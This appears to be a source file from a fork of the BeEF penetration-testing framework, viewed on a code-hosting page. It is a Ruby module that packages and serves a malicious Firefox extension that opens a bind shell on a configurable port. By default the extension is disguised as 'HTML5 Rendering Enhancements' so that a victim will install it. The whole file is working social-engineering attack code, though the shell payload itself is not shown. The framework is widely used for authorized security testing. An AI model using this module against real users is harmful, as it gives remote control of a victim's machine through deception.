Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1d719b30ee77e4ef52152bfa89ae31f48153ba1b
beef/modules/social_engineering/firefox_extension_bindshell/module.rb
zinduolis 95793433fa Update copyright year to 2026
2025-12-26 19:18:05 +10:00

77 lines
3.3 KiB
Ruby
Raw Blame History

#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Firefox_extension_bindshell < BeEF::Core::Command
class Bind_extension < BeEF::Core::Router::Router
before do
headers 'Content-Type' => 'application/x-xpinstall',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
get '/' do
response['Content-Type'] = 'application/x-xpinstall'
extension_path = settings.extension_path
print_info "Serving malicious Firefox Extension (Bindshell): #{extension_path}"
send_file extension_path.to_s,
type: 'application/x-xpinstall',
disposition: 'inline'
end
end
def pre_send
# gets the value configured in the module configuration by the user
@datastore.each do |input|
@extension_name = input['value'] if input['name'] == 'extension_name'
@xpi_name = input['value'] if input['name'] == 'xpi_name'
@lport = input['value'] if input['name'] == 'lport'
end
mod_path = "#{$root_dir}/modules/social_engineering/firefox_extension_bindshell"
extension_path = "#{mod_path}/extension"
# clean the build directory
FileUtils.rm_rf("#{extension_path}/build/.", secure: true)
# copy in the build directory necessary file, substituting placeholders
File.open("#{extension_path}/build/install.rdf", 'w') do |file|
file.puts File.read("#{extension_path}/install.rdf").gsub!('__extension_name_placeholder__', @extension_name)
end
File.open("#{extension_path}/build/bootstrap.js", 'w') { |file| file.puts File.read("#{extension_path}/bootstrap.js").gsub!('__bindshell_port_placeholder__', @lport) }
File.open("#{extension_path}/build/overlay.xul", 'w') { |file| file.puts File.read("#{extension_path}/overlay.xul") }
File.open("#{extension_path}/build/chrome.manifest", 'w') { |file| file.puts File.read("#{extension_path}/chrome.manifest") }
extension_content = ['install.rdf', 'bootstrap.js', 'overlay.xul', 'chrome.manifest']
# create the XPI extension container
xpi = "#{extension_path}/#{@xpi_name}.xpi"
File.delete(xpi) if File.exist?(xpi)
Zip::File.open(xpi, Zip::File::CREATE) do |xpi|
extension_content.each do |filename|
xpi.add(filename, "#{extension_path}/build/#{filename}")
end
end
# mount the extension in the BeEF web server, calling a specific nested class (needed because we need a specific content-type/disposition)
bind_extension = Firefox_extension_bindshell::Bind_extension
bind_extension.set :extension_path, "#{$root_dir}/modules/social_engineering/firefox_extension_bindshell/extension/#{@xpi_name}.xpi"
BeEF::Core::Server.instance.mount("/#{@xpi_name}.xpi", bind_extension.new)
BeEF::Core::Server.instance.remap
end
def self.options
[
{ 'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements' },
{ 'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements' },
{ 'name' => 'lport', 'ui_label' => 'Listen Port', 'value' => '1337' }
]
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end
Reference in New Issue View Git Blame Copy Permalink